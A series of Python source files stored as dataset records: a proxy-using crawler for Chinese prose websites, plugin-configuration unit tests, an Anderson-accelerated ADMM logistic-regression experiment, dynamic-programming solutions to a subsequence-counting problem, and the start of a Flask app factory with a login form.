fout.close()\n\n def forward(self):\n self.kind_url = [\n \"http://www.sanwenji.cn/sanwen/shuqing/list_\",\n \"http://www.sanwenji.cn/sanwen/sanwen/shanggan/list_\",\n \"http://www.sanwenji.cn/sanwen/youmeisanwen/list_\",\n \"http://www.sanwenji.cn/sanwen/suibi/list_\",\n \"http://www.sanwenji.cn/sanwen/xiandai/list_\",\n \"http://www.sanwenji.cn/sanwen/sanwen/xiejing/list_\",\n \"http://www.sanwenji.cn/sanwen/sanwen/lizhi/list_\"\n ]\n self.base_name = 'sanwenji/'\n self.kind_name = []\n self.poem_classes = []\n for url in self.kind_url:\n cur_poem_class = url.split('/')[-2]\n self.poem_classes.append(cur_poem_class)\n url = self.base_name + url.split('/')[-2] + '/'\n self.kind_name.append(url)\n\n for u , n , c in zip(self.kind_url, self.kind_name , self.poem_classes):\n self.getOneKindPoem(u,n,c)\n\n self.save(self.dir_to_save)\n\nclass poemChinaSw(poemSpider):\n def __init__(self , base_url=None, dir_to_save=os.path.join(r'E:\\\\PycharmProjects\\\\FirstDayOnMS2\\\\Data\\\\Poem','chinasw/chinasw.json'),base_dir_for_save = r'E:\\\\PycharmProjects\\\\FirstDayOnMS2\\\\Data\\\\Poem',website_to_crawl = '中国散文网'):\n super(poemChinaSw,self).__init__(base_url, dir_to_save,base_dir_for_save,website_to_crawl = website_to_crawl)\n self.tool = WebProxyTool() #中国散文网有反扒机制\n self.crawled_list = []\n self.duplicate_num = 0\n\n def getPage(self,href):\n try:\n crawlable_url = self.tool.getCrawlUrl(href)\n req = requests.get(url=crawlable_url)\n if req.status_code == 404:\n return None\n # req.encoding = \"gb18030\" # in case of Chinese character\n req.encoding = \"utf-8\"\n html = req.text\n bf = BeautifulSoup(html, 'html.parser')\n return bf\n except:\n print(\"getPage Wrong\")\n return None\n\n def getOnePoem(self,href):\n try:\n html = self.getPage(href)\n texts = html.select('div[class=\"row-article\"]')[0]\n article = texts.select('h1')[0].get_text()\n content = texts.select('div[class=\"article-content\"]')[0].get_text()\n content = content.replace(\"(中国散文网- www.sanwen.com)\", \"\").split(\"中国散文网首发:http://www.sanwen.com\")[-2]\n print(content)\n return article , content\n except:\n print(href)\n\n def getPoemList(self,target):\n bf = self.getPage(target)\n if bf is None:\n return None\n hrefs_to_crawl = []\n div = bf.select('div[class=\"list-base-article\"]')[0]\n ul = div.select('ul')[0]\n lis = ul.select('li')\n for li in lis:\n a = li.select('a')[0]\n hrefs_to_crawl.append(\"http://www.sanwen.com\" + a['href'])\n return hrefs_to_crawl\n\n def getOneKindPoem(self,base_url, save_dir_base,cur_poem_class):\n pre = base_url + \"list_\"\n post = \".html\"\n # for number in range(20,100):\n for number in range(1, 20):\n print(\"number = \", number)\n url = pre + str(number) + post\n hrefs_to_crawl = self.getPoemList(url)\n if hrefs_to_crawl is None:\n break\n\n for i, ele in enumerate(hrefs_to_crawl):\n print(\"number = \", number, \" i= \", i)\n if ele in self.crawled_list:\n self.duplicate_num += 1\n print(\"duplicat_num = \", self.duplicate_num)\n continue\n else:\n self.crawled_list.append(ele)\n poem_title, poem_content = self.getOnePoem(ele)\n onePoem = poem_title + \"。\" + poem_content\n if len(onePoem) == 0:\n print(\"ele = \", ele)\n continue\n self.num_poems += 1\n temp_dict = {\"poem_id\": self.num_poems,\n 'poem_title': poem_title,\n 'origin_poem': poem_content,\n 'poem_class': cur_poem_class,\n 'url': ele,\n 'website_name': self.website_to_crawl\n }\n self.poems.append(temp_dict)\n '''\n 下面是将这篇散文保存到一个文件夹的逻辑\n '''\n if self.base_dir_for_save:\n save_dir_base = os.path.join(self.base_dir_for_save, save_dir_base)\n if not os.path.exists(save_dir_base):\n os.makedirs(save_dir_base)\n print(\"save_dir_base\", save_dir_base)\n filename = save_dir_base + str(number) + \"__\" + str(i)\n print(\"filename = \", filename)\n with open(filename + \".txt\", \"w\", encoding=\"utf8\") as fout:\n fout.write(\"\\n\".join(onePoem))\n # with open(filename + '.pkl', \"wb\") as fout:\n # pickle.dump(onePoem, fout)\n # fout.close()\n\n def getKindList(self,url):\n try:\n html = self.getPage(url)\n hrefs = []\n divs = html.select('div[class=\"list-article-shanggan\"]')[0]\n\n divs = divs.select('div[class=\"list-article-shanggan-box\"]')\n\n for div in divs:\n li = div.select('li[class=\"head\"]')[0]\n\n a = li.select('a')[0]\n hrefs.append(\"http://www.sanwen.com\" + a['href'])\n return hrefs\n except:\n print(\"url = \", url)\n\n def forward(self):\n if self.base_url is None:\n self.base_url = \"http://www.sanwen.com/sanwen/jingdiansanwen/\"\n self.kind_url = self.getKindList(self.base_url)\n print(\"kind_url = \", self.kind_url)\n print(\"len = \", len(self.kind_url))\n self.poem_classes = [url.split('/')[-2] for url in self.kind_url]\n self.poem_classes = [re.sub('sanwen','',url) for url in self.poem_classes]\n print(\"poem_classes = \",self.poem_classes)\n self.base_name = 'chinasw/'\n self.kind_name = []\n for url in self.kind_url:\n url = self.base_name + url.split('/')[-2]+'/'\n print(\"url = \",url)\n self.kind_name.append(url)\n for u , n ,c in zip(self.kind_url,self.kind_name,self.poem_classes):\n try:\n self.getOneKindPoem(u,n,c)\n except:\n print(\"u = \",u)\n print(\"n = \",n)\n print(\"breaked\")\n self.save()\n\nclass poemDusanwen(poemSpider):\n def __init__(self , base_url=None, dir_to_save=os.path.join(r'E:\\\\PycharmProjects\\\\FirstDayOnMS2\\\\Data\\\\Poem','dusanwen/dusanwen.json'),base_dir_for_save = r'E:\\\\PycharmProjects\\\\FirstDayOnMS2\\\\Data\\\\Poem',website_to_crawl = '文章阅读网'):\n super(poemDusanwen,self).__init__(base_url, dir_to_save,base_dir_for_save,website_to_crawl = website_to_crawl)\n self.tool = WebProxyTool() #中国散文网有反扒机制\n self.crawled_list = []\n self.duplicate_num = 0\n\n def makePoemObject(self, main_class, sub_class, href, page_title, Jokes):\n New_Jokes = []\n for joke in Jokes:\n joke = [re.sub(r'\\(.*\\)|(.*)', '', ele) for ele in joke]\n joke = [re.sub(r'^(0|1|2|3|4|5|6|7|8|9|0)',\"\",ele) for ele in joke]\n\n one_joke = {\n 'main_class':main_class,'sub_class':sub_class,\n 'url': href, 'page_title': page_title, \"content\": joke\n }\n New_Jokes.append(one_joke)\n return New_Jokes\n\nif __name__ == \"__main__\":\n pass\n # spiderOnsanwenji= poemSanwenji(base_url=None)\n # spiderOnsanwenji.forward()\n # goon = input(\"go on? [Y/N]\")\n # if not( goon.lower() == \"y\" or goon.lower() == \"yes\" ):\n # exit(90)\n # poemSpiderOnchinasw = poemChinaSw(base_url=\"http://www.sanwen.com/sanwen/jingdiansanwen/\")\n # poemSpiderOnchinasw.forward()\n\n","sub_path":"Model/Poem/crawlPoem.py","file_name":"crawlPoem.py","file_ext":"py","file_size_in_byte":14106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"225917915","text":"# encoding: utf-8\nfrom .. import DatabaseTest\nfrom ...model import create\n\nimport unittest\nfrom mock import MagicMock\nfrom nose.tools import assert_raises\n\nfrom ...model.plugin_configuration import PluginConfiguration\nfrom ...model.library import Library\n\n# Varibles for test cases\nLIB_ID = 1\n\nclass TestPluginGetValues(DatabaseTest):\n def test_plugin_get_saved_values_lib_not_valid(self):\n class MockPlugin(PluginConfiguration):\n def __init__(self, *args, **kwargs):\n pass\n\n def _get_library_from_short_name(self, library_short_name):\n return Library(id=LIB_ID, short_name=\"T1\")\n\n mocked_plugin = MockPlugin()\n assert_raises(Exception, mocked_plugin.get_saved_values, \"a lib\", \"a plugin\")\n\n def test_plugin_get_saved_values_error_querying_db(self):\n class MockPlugin(PluginConfiguration):\n def __init__(self, *args, **kwargs):\n pass\n\n def _get_saved_values(*args, **kwargs):\n raise Exception\n\n def _get_library_from_short_name(self, library_short_name):\n return Library(id=LIB_ID, short_name=\"T1\")\n\n mocked_plugin = MockPlugin()\n assert_raises(Exception, mocked_plugin.get_saved_values, \"a lib\", \"a plugin\")\n\n\nclass TestPluginSaveValues(DatabaseTest):\n class MockPlugin(PluginConfiguration):\n def __init__(self, *args, **kwargs):\n pass\n\n def test_library_not_found(self):\n plugin = PluginConfiguration()\n assert_raises(Exception, plugin.save_values, \"library\", \"plugin\", {})\n\n def test_insert_value_db_empty(self):\n library, ignore = create(\n self._db, Library, id=LIB_ID, name=\"Lib\", short_name=\"L1\"\n )\n \n plugin_name = \"plugin\"\n key = \"key-to-test\"\n val = \"value to test\"\n data = {key: val}\n\n plugin = PluginConfiguration()\n plugin._perform_db_operations = MagicMock()\n plugin.save_values(self._db, library.short_name, plugin_name, data)\n\n plugin._perform_db_operations.assert_called_with(self._db,\n [{\n \"lib_id\": LIB_ID,\n \"target_key\": plugin_name + \".\" + key,\n \"value\": val\n }],\n [],\n [],\n )\n\n def test_insert_value_with_another_data_existing_in_db(self):\n library, ignore = create(\n self._db, Library, id=LIB_ID, name=\"Lib\", short_name=\"L1\"\n )\n \n pname = \"plugin\"\n new_key = \"key-to-test\"\n new_val = \"value to test\"\n key_to_keep = \"key-to-keep\"\n val_to_keep = \"val to keep\"\n\n data = {new_key: new_val, key_to_keep: val_to_keep}\n\n _, _ = create(\n self._db, PluginConfiguration, id=1, library_id=library.id, key=pname+\".\"+key_to_keep,\n _value=val_to_keep\n )\n\n plugin = PluginConfiguration()\n plugin._perform_db_operations = MagicMock()\n plugin.save_values(self._db, library.short_name, pname, data)\n\n plugin._perform_db_operations.assert_called_with(self._db,\n [{\n \"lib_id\": LIB_ID,\n \"target_key\": pname + \".\" + new_key,\n \"value\": new_val\n }],\n [],\n [] )\n def test_update_values(self):\n library, ignore = create(\n self._db, Library, id=LIB_ID, name=\"Lib\", short_name=\"L1\"\n )\n \n pname = \"plugin\"\n key_to_update = \"key-to-keep\"\n new_val = \"val to keep\"\n \n data = {key_to_update: new_val}\n\n plugin_instance, _ = create(\n self._db, PluginConfiguration, id=1, library_id=library.id, key=pname+\".\"+key_to_update,\n _value=new_val+\" old\"\n )\n\n plugin = PluginConfiguration()\n plugin._perform_db_operations = MagicMock()\n plugin.save_values(self._db, library.short_name, pname, data)\n\n plugin._perform_db_operations.assert_called_with(self._db,\n [],\n [{\n \"lib_id\": LIB_ID,\n \"target_key\": pname + \".\" + key_to_update,\n \"value\": new_val\n }],\n [] )\n\n def test_delete_value(self):\n library, ignore = create(\n self._db, Library, id=LIB_ID, name=\"Lib\", short_name=\"L1\"\n )\n \n pname = \"plugin\"\n key_to_delete = \"key-to-keep\"\n val_to_delete = \"val to keep\"\n \n data = {}\n\n plugin_instance, _ = create(\n self._db, PluginConfiguration, id=1, library_id=library.id, key=pname+\".\"+key_to_delete,\n _value=val_to_delete\n )\n\n plugin = PluginConfiguration()\n plugin._perform_db_operations = MagicMock()\n plugin.save_values(self._db, library.short_name, pname, data)\n\n plugin._perform_db_operations.assert_called_with(self._db,\n [],\n [],\n [{\n \"lib_id\": LIB_ID,\n \"target_key\": pname + \".\" + key_to_delete,\n }])\n\nclass TestPluginGetSavedValues(DatabaseTest):\n def test_plugin_empty_values(self):\n library, ignore = create(\n self._db, Library, id=LIB_ID, name=\"Lib\", short_name=\"L1\"\n )\n plugin = PluginConfiguration()\n saved_values = plugin._get_saved_values(self._db, library, \"any_plugin\")\n assert saved_values == {}\n\n def test_plugin_find_values(self):\n pname = \"plugin_name\"\n key1 = \"key1\"\n value1 = \"value1\"\n key2 = \"key2\"\n value2 = \"value2\"\n\n library, ignore = create(\n self._db, Library, id=LIB_ID, name=\"Lib\", short_name=\"L1\"\n )\n\n plugin1, ignore = create(\n self._db, PluginConfiguration, id=1, library_id=library.id, key=pname+\".\"+key1, _value=value1\n )\n plugin2, ignore = create(\n self._db, PluginConfiguration, id=2, library_id=library.id, key=pname+\".\"+key2, _value=value2\n )\n \n plugin = PluginConfiguration()\n saved_values = plugin._get_saved_values(self._db, library, pname)\n assert key1 in saved_values\n assert saved_values[key1] == value1\n assert key2 in saved_values\n assert saved_values[key2] == value2\n\n\nclass TestPluginFromShortName(DatabaseTest):\n def test_plugin_find_library(self):\n name = \"Test Library Name\"\n short_name = \"T1\"\n inserted_library, ignore = create(\n self._db, Library, id=LIB_ID, name=name, short_name=short_name\n )\n\n plugin = PluginConfiguration()\n library = plugin._get_library_from_short_name(self._db, short_name)\n assert library.name == inserted_library.name \n assert library.id == inserted_library.id\n assert library.short_name == inserted_library.short_name\n\n def test_plugin_dont_find_library(self):\n plugin = PluginConfiguration()\n assert_raises(Exception, plugin._get_library_from_short_name, self._db, \"any_name\")\n\n","sub_path":"tests/models/test_plugin_configuration.py","file_name":"test_plugin_configuration.py","file_ext":"py","file_size_in_byte":8273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"517291698","text":"import sys\nsys.path.append('../')\n\nfrom aa_admm.base_test import *\nfrom aa_admm.solver import *\n\nclass TestExamples(BaseTest):\n \"\"\" Unit tests for different examples \"\"\"\n \n def setUp(self):\n np.random.seed(1)\n self.rho = 10\n self.lambda_ = 2\n self.dataA = None\n self.y = None\n self.m = None\n self.n = None\n self.z_true_approx = None\n self.J = None\n self.es = None\n self.beta12 = None\n self.beta123 = None\n self.rho_M = None\n self.rho_T2 = None\n self.rho_T3 = None\n self.residuals = None\n self.errors = None\n self.eps_abs = 1e-16\n self.eps_rel = 1e-16\n self.maxit = 100\n \n def update_x(self, z, u, x0=None):\n # solve the x update\n # minimize [ -logistic(x_i) + (rho/2)||x_i - z^k + u^k||^2 ]\n # via Newton's method; for a single subsystem only.\n alpha = 0.1\n BETA = 0.5\n TOLERANCE = 1e-15\n MAX_ITER = 100\n yA = np.diag(np.ravel(self.y)) @ self.dataA\n I = np.eye(self.n+1)\n\n if (x0 is not None):\n x = x0\n else:\n x = np.zeros(self.n+1)\n\n C = np.c_[-self.y, -yA]\n f = lambda w: np.average(np.log(1 + np.exp(C@w))) + (self.rho/2)*np.linalg.norm(w - z + u)**2\n for iter in range(MAX_ITER):\n fx = f(x)\n g = C.T @ ( np.exp(C@x) / (1 + np.exp(C@x)) ) / self.m + self.rho*(x - z + u)\n H = C.T @ np.diag(np.ravel( np.exp(C@x) / (1 + np.exp(C@x))**2 )) @ C / self.m + self.rho*I\n dx = np.linalg.solve(-H,g) # Newton step\n dfx = g.T @ dx # Newton decrement\n if abs(dfx) < TOLERANCE:\n break\n\n # backtracking\n t = 1\n while f(x + t*dx) > fx + alpha*t*dfx:\n t = BETA*t\n\n x = x + t*dx\n\n return x\n \n def compute_rho_M(self):\n if self.z_true_approx is None:\n raise ValueError('Approximate true solution has not been evaluated!')\n z = self.z_true_approx.copy()\n # Use finite difference to get approximate gradient of ADMM iterations\n ep = 1e-4;\n J = np.zeros((self.n+1, self.n+1)); # Can be refined to store only n(n+1)/2 entries since Z is symmetric\n for j in range(self.n+1):\n h = np.zeros(self.n+1)\n h[j] = ep\n\n zph = z + h\n zmh = z - h\n\n uph = 2*self.lambda_*zph/self.rho\n umh = 2*self.lambda_*zmh/self.rho\n\n # perform one admm step to compute q(z+h)\n xph = self.update_x(zph, uph, z)\n zph = self.rho * (xph+uph) / (2*self.lambda_+self.rho)\n\n # perform one admm step to compute q(z-h)\n xmh = self.update_x(zmh, umh, z)\n zmh = self.rho * (xmh+umh) / (2*self.lambda_+self.rho)\n\n J[:,j] = np.ravel((zph-zmh)/2/ep)\n\n self.J = J\n # Compute the spectrum of Jacobian J\n self.es = scipy.linalg.eigvals(J)\n self.rho_M = max(abs(self.es))\n \n def test_regularized_logistic_regression(self):\n # Problem data.\n self.dataA = np.loadtxt('./data/madelon/madelon_train.data')[::10,::2]\n self.y = np.loadtxt('./data/madelon/madelon_train.labels')[::10]\n self.m, self.n = self.dataA.shape\n \n admm_update = [lambda z, u: self.update_x(z, u),\n lambda x, u: self.rho * (x+u) / (2*self.lambda_+self.rho),\n lambda z: 2*self.lambda_*z/self.rho]\n\n \n # Set A, B, b\n A = np.eye(self.n+1)\n B = -np.eye(self.n+1)\n b = np.zeros(self.n+1)\n \n # Compute results\n self.z_true_approx, _, _, self.c20, _ = AA_ADMM_Z(admm_update, A, B, b, 20, self.rho, self.maxit, self.eps_abs, self.eps_rel)\n _, r0, e0, _, t0 = AA_ADMM_Z(admm_update, A, B, b, 0, self.rho, self.maxit, self.eps_abs, self.eps_rel, z_true=self.z_true_approx, solIsApprox=True)\n _, r1, e1, self.c1, t1 = AA_ADMM_Z(admm_update, A, B, b, 1, self.rho, self.maxit, self.eps_abs, self.eps_rel, z_true=self.z_true_approx, solIsApprox=True)\n _, r2, e2, self.c2, t2 = AA_ADMM_Z(admm_update, A, B, b, 2, self.rho, self.maxit, self.eps_abs, self.eps_rel, z_true=self.z_true_approx, solIsApprox=True) \n _, r3, e3, self.c3, t3 = AA_ADMM_Z(admm_update, A, B, b, 3, self.rho, self.maxit, self.eps_abs, self.eps_rel, z_true=self.z_true_approx, solIsApprox=True) \n _, r5, e5, self.c5, t5 = AA_ADMM_Z(admm_update, A, B, b, 5, self.rho, self.maxit, self.eps_abs, self.eps_rel, z_true=self.z_true_approx, solIsApprox=True) \n _, r10, e10, self.c10, t10 = AA_ADMM_Z(admm_update, A, B, b, 10, self.rho, self.maxit, self.eps_abs, self.eps_rel, z_true=self.z_true_approx, solIsApprox=True) \n #_, r10, e10, self.c20, _ = AA_ADMM_Z(admm_update, A, B, b, 20, self.rho, self.maxit, self.eps_abs, self.eps_rel, z_true=self.z_true_approx, solIsApprox=True)\n \n # Compute beta in sAA(1)-ADMM\n self.compute_rho_M()\n print(self.rho_M)\n beta = (1-np.sqrt(1-self.rho_M))/(1+np.sqrt(1-self.rho_M)) # beta for sAA(1)\n self.beta12, self.rho_T2 = opt_sAA2_coeff(self.es) # beta1, beta2 for sAA(2)\n# self.beta123, self.rho_T3 = opt_sAA3_coeff(self.es, np.arange(0.5,0.81,0.005), np.arange(-0.2,0.01,0.005), np.arange(0,0.03,0.001)) # beta1, beta2, beta3 for sAA(3)\n self.beta123 = (0.61, -0.115, 0.009)\n self.rho_T3 = 0.3642705722804524\n print(1-np.sqrt(1-self.rho_M)) # rho(T) of sAA(1)\n print(self.rho_T2) # rho(T2) of sAA(2)\n print(self.rho_T3) # rho(T3) of sAA(3)\n \n _, r_sAA1, e_sAA1, _, _ = AA_ADMM_Z(admm_update, A, B, b, 1, self.rho, self.maxit, self.eps_abs, self.eps_rel, z_true=self.z_true_approx, use_sAA=True, beta=beta, solIsApprox=True)\n _, r_sAA2, e_sAA2, _, _ = AA_ADMM_Z(admm_update, A, B, b, 2, self.rho, self.maxit, self.eps_abs, self.eps_rel, z_true=self.z_true_approx, use_sAA=True, beta=self.beta12, solIsApprox=True)\n _, r_sAA3, e_sAA3, _, _ = AA_ADMM_Z(admm_update, A, B, b, 3, self.rho, self.maxit, self.eps_abs, self.eps_rel, z_true=self.z_true_approx, use_sAA=True, beta=self.beta123, solIsApprox=True)\n \n # accelerate ADMM by over-relaxation ('relax' = 1.9 gives the best convergence)\n# _, _, e_rx1, _, t_rx1 = AA_ADMM_Z(admm_update, A, B, b, 0, self.rho, self.maxit, self.eps_abs, self.eps_rel, relaxation=1.1, z_true=self.z_true_approx, solIsApprox=True)\n# _, _, e_rx2, _, t_rx2 = AA_ADMM_Z(admm_update, A, B, b, 0, self.rho, self.maxit, self.eps_abs, self.eps_rel, relaxation=1.2, z_true=self.z_true_approx, solIsApprox=True)\n# _, _, e_rx3, _, t_rx3 = AA_ADMM_Z(admm_update, A, B, b, 0, self.rho, self.maxit, self.eps_abs, self.eps_rel, relaxation=1.3, z_true=self.z_true_approx, solIsApprox=True)\n# _, _, e_rx4, _, t_rx4 = AA_ADMM_Z(admm_update, A, B, b, 0, self.rho, self.maxit, self.eps_abs, self.eps_rel, relaxation=1.4, z_true=self.z_true_approx, solIsApprox=True)\n# _, _, e_rx5, _, t_rx5 = AA_ADMM_Z(admm_update, A, B, b, 0, self.rho, self.maxit, self.eps_abs, self.eps_rel, relaxation=1.5, z_true=self.z_true_approx, solIsApprox=True)\n# _, _, e_rx6, _, t_rx6 = AA_ADMM_Z(admm_update, A, B, b, 0, self.rho, self.maxit, self.eps_abs, self.eps_rel, relaxation=1.6, z_true=self.z_true_approx, solIsApprox=True)\n# _, _, e_rx7, _, t_rx7 = AA_ADMM_Z(admm_update, A, B, b, 0, self.rho, self.maxit, self.eps_abs, self.eps_rel, relaxation=1.7, z_true=self.z_true_approx, solIsApprox=True)\n# _, _, e_rx8, _, t_rx8 = AA_ADMM_Z(admm_update, A, B, b, 0, self.rho, self.maxit, self.eps_abs, self.eps_rel, relaxation=1.8, z_true=self.z_true_approx, solIsApprox=True)\n _, _, e_rx, _, t_rx = AA_ADMM_Z(admm_update, A, B, b, 0, self.rho, self.maxit, self.eps_abs, self.eps_rel, relaxation=1.9, z_true=self.z_true_approx, solIsApprox=True)\n \n # store residuals results\n self.errors = [e0, e1, e2, e3, e5, e10, e_rx, e_sAA1, e_sAA2, e_sAA3]\n self.timings = [t0, t1, t2, t3, t5, t10, t_rx]\n \n def plot_aa_admm_errors(self):\n # Plot errors comparing ADMM and AA-ADMM\n e_sAA = self.errors[6]\n rho_ref1 = (e_sAA[0]+0.05) * np.power((1-np.sqrt(1-self.rho_M)), np.linspace(0, 40, 41))\n rho_ref2 = (e_sAA[0]+0.2) * np.power(self.rho_T2, np.linspace(0, 36, 37))\n rho_ref3 = (e_sAA[0]+0.03) * np.power(self.rho_T3, np.linspace(0, 31, 32))\n self.plot_results(self.errors + [rho_ref1, rho_ref2, rho_ref3], \\\n labels=['ADMM', 'AA(1)-ADMM', 'AA(2)-ADMM', 'AA(3)-ADMM', 'AA(5)-ADMM', 'AA(10)-ADMM', \\\n 'rADMM(1.6)', 'sAA(1)-ADMM', 'sAA(2)-ADMM', 'sAA(3)-ADMM', \\\n r'$\\rho^*_{sAA(1)}$', r'$\\rho^*_{sAA(2)}$', r'$\\rho^*_{sAA(3)}$'], \\\n linestyles=['-', '-', '-', '-', '-', '-', '-.', '-.', '-.', '-.', ':', ':', ':'],\\\n colors=['k', 'r', 'g', 'b', 'c', 'gray', 'm', 'r', 'g', 'b', 'r', 'g', 'b'],\\\n linewidths=[3.5, 3.5, 3.5, 3.5, 3.5, 3.5, 2.5, 2.5, 2.5, 2.5, 1.5, 1.5, 1.5], \\\n pltError=True,\\\n maxIt=82,\\\n filename='iters_logreg.png')\n \n def plot_saa_admm_errors(self):\n # Plot errors comparing ADMM and sAA-ADMM\n e_sAA = self.errors[-1]\n rho_ref1 = e_sAA[0] * np.power((1-np.sqrt(1-self.rho_M)), np.linspace(0, 40, 41))\n rho_ref2 = e_sAA[0] * np.power(self.rho_T2, np.linspace(0, 40, 41))\n rho_ref3 = e_sAA[0] * np.power(self.rho_T3, np.linspace(0, 31, 32))\n self.plot_results([self.errors[0]]+self.errors[7:]+[rho_ref1, rho_ref2, rho_ref3], \\\n labels=['ADMM', 'sAA(1)-ADMM', 'sAA(2)-ADMM', 'sAA(3)-ADMM',\\\n r'$\\rho^*_{sAA(1)}$', r'$\\rho^*_{sAA(2)}$', r'$\\rho^*_{sAA(3)}$'], \\\n linestyles=['-', '-', '-', '-', '--', '--', '--'],\n pltError=True,\n maxIt=82)\n \n# def plot_radmm_errors(self):\n# # Plot errors comparing ADMM and relaxed-ADMM\n# self.plot_results(self.relax_errors, \\\n# labels=['rADMM(1.1)', 'rADMM(1.2)', 'rADMM(1.3)', 'rADMM(1.4)', 'rADMM(1.5)', 'rADMM(1.6)', 'rADMM(1.7)', 'rADMM(1.8)', 'rADMM(1.9)'], \\\n# linestyles=['-','-', '-', '-', '-', '-', '-', '-', '-'],\n# pltError=True)\n \n def plot_timings(self):\n self.plot_results(self.errors[:7], ts=self.timings, \\\n labels=['ADMM', 'AA(1)-ADMM', 'AA(2)-ADMM', 'AA(3)-ADMM', 'AA(5)-ADMM', 'AA(10)-ADMM', 'rADMM(1.9)'],\n linestyles=['-', '-', '-', '-', '-', '-', '-'],\\\n colors=['k', 'r', 'g', 'b', 'c', 'gray', 'm'],\\\n linewidths=[3.5, 3.5, 3.5, 3.5, 3.5, 3.5, 3.5], \\\n pltError=True,\\\n maxIt=82,\\\n filename='timing_logreg.png')\n \n def plot_eigs(self):\n if self.es is None or self.J is None:\n raise ValueError('The Jacobian and spectrum have not been evaluated!')\n # plot eigs of q'\n X = [e.real for e in self.es]\n Y = [e.imag for e in self.es]\n plt.scatter(X, Y, marker='*', label=r\"$\\sigma(q'(x^*))$\")\n \n # plot eigs of accelerated iteration matrix T\n beta = (1-np.sqrt(1-self.rho_M))/(1+np.sqrt(1-self.rho_M))\n T = np.block([\n [(1+beta)*self.J, -beta*self.J],\n [np.eye(self.J.shape[1]), np.zeros(self.J.shape)]\n ])\n eigsT = scipy.linalg.eigvals(T)\n X = [e.real for e in eigsT]\n Y = [e.imag for e in eigsT]\n plt.scatter(X, Y, marker='*', label=r\"$\\sigma(\\Psi'(X^*))$\")\n \n # plot eigs of sAA(2) accelerated matrix T2\n beta1, beta2 = self.beta12\n I = np.eye(self.n+1)\n O = np.zeros((self.n+1, self.n+1))\n T2 = np.block([\n [(1+beta1+beta2)*self.J, -beta1*self.J, -beta2*self.J],\n [I, O, O ],\n [O, I, O ]\n ])\n eigsT2 = scipy.linalg.eigvals(T2)\n X = [e.real for e in eigsT2]\n Y = [e.imag for e in eigsT2]\n plt.scatter(X, Y, marker='*', label=r\"$\\sigma(\\Psi_2'(X^*))$\")\n \n # plot eigs of sAA(2) accelerated matrix T3\n beta1, beta2, beta3 = self.beta123\n T3 = np.block([\n [(1+beta1+beta2+beta3)*self.J, -beta1*self.J, -beta2*self.J, -beta3*self.J],\n [I, O, O, O],\n [O, I, O, O],\n [O, O, I, O]\n ])\n eigsT3 = scipy.linalg.eigvals(T3)\n X = [e.real for e in eigsT3]\n Y = [e.imag for e in eigsT3]\n plt.scatter(X, Y, marker='*', label=r\"$\\sigma(\\Psi_3'(X^*))$\")\n plt.xticks(fontsize=15)\n plt.yticks(fontsize=15)\n \n plt.xlim(left=0)\n plt.legend(prop={'size': 14},loc=\"upper right\")\n plt.savefig('eigs_logreg.png')\n plt.show()\n\nif __name__ == '__main__':\n tests = TestExamples()\n tests.setUp()\n tests.test_regularized_logistic_regression()\n tests.plot_aa_admm_errors()\n# tests.plot_saa_admm_errors()\n tests.plot_timings()\n tests.plot_eigs()\n","sub_path":"examples/reg_logistic_regression.py","file_name":"reg_logistic_regression.py","file_ext":"py","file_size_in_byte":13560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"180402887","text":"#回溯法base版,超时\n\nclass Solution:\n def numDistinct(self, s, t):\n self.ans = 0\n self.helper(s, t, 0)\n return self.ans\n\n def helper(self, s, t, index):\n\n if index == len(t):\n self.ans += 1\n return\n for i in range(len(s)):\n if s[i] == t[index]:\n self.helper(s[i + 1:], t, index + 1)\n\n#利用 Memoization trick 加快回溯过程,勉强AC\nclass Solution:\n def numDistinct(self, s, t):\n self.ans = 0\n hashmap = {}\n self.helper(s, t, 0, hashmap)\n return self.ans\n\n def helper(self, s, t, index, map):\n\n if index == len(t):\n self.ans += 1\n return\n if s + str(index) in map:\n self.ans += map[s + str(index)]\n return\n for i in range(len(s)):\n if s[i] == t[index]:\n tmp = self.ans\n self.helper(s[i + 1:], t, index + 1, map)\n increment = self.ans - tmp\n map[s[i + 1:] + str(index + 1)] = increment\n \n#DP \nclass Solution:\n def numDistinct(self, s: str, t: str) -> int:\n n1 = len(s)\n n2 = len(t)\n #前0个到前n个,故长度为n+1\n dp = [[0] * (n1 + 1) for _ in range(n2 + 1)]\n #dp[i][j]表示T的前i个字符构成的子序列在S的前j个字符构成的子序列中出现的次数\n #空串是任何串的子串,所以dp[0][j] = 1\n for j in range(n1 + 1):\n dp[0][j] = 1\n for i in range(1, n2 + 1):\n for j in range(1, n1 + 1):\n #t[i - 1]代表的是第i个��符,刚好与下面的dp[i][j]代表的前i个字符相对应\n if t[i - 1] == s[j - 1]:\n dp[i][j] = dp[i - 1][j - 1] + dp[i][j - 1]\n else:\n dp[i][j] = dp[i][j - 1]\n #print(dp)\n return dp[-1][-1]\n","sub_path":"dp/Distinct_Subsequences.py","file_name":"Distinct_Subsequences.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"79959868","text":"# -*- coding: utf-8 -*-\n'''The app module, containing the app factory function.'''\nfrom flask import Flask, render_template\n\nfrom nektime.settings import ProdConfig\nfrom nektime.assets import assets\nfrom nektime.extensions import (\n bcrypt,\n cache,\n db,\n login_manager,\n migrate,\n debug_toolbar,\n api,\n admin,\n)\nfrom nektime import public\n\n\n\ndef create_app(config_object=ProdConfig):\n '''An application factory, as explained here:\n http://flask.pocoo.org/docs/patterns/appfactories/\n\n :param config_object: The configuration object to use.\n '''\n app = Flask(__name__)\n app.config.from_object(config_object)\n register_extensions(app)\n register_blueprints(app)\n # register_errorhandlers(app)\n return app\n\n\ndef register_extensions(app):\n assets.init_app(app)\n bcrypt.init_app(app)\n cache.init_app(app)\n db.init_app(app)\n login_manager.init_app(app)\n debug_toolbar.init_app(app)\n migrate.init_app(app, db)\n api.init_app(app)\n admin.init_app(app)\n return None\n\n\ndef register_blueprints(app):\n app.register_blueprint(public.api.mod)\n return None\n\n\n\n######################################3\nfrom wtforms import form, fields, validators\nimport flask_login as login\n\nclass LoginForm(form.Form):\n login = fields.TextField(validators=[validators.required()])\n password = fields.PasswordField(validators=[validators.required()])\n\n def validate_login(self, field):\n user = self.get_user()\n\n if user is None:\n raise validators.ValidationError('Invalid user')\n\n # we're comparing the plaintext pw with the the hash from the db\n if not 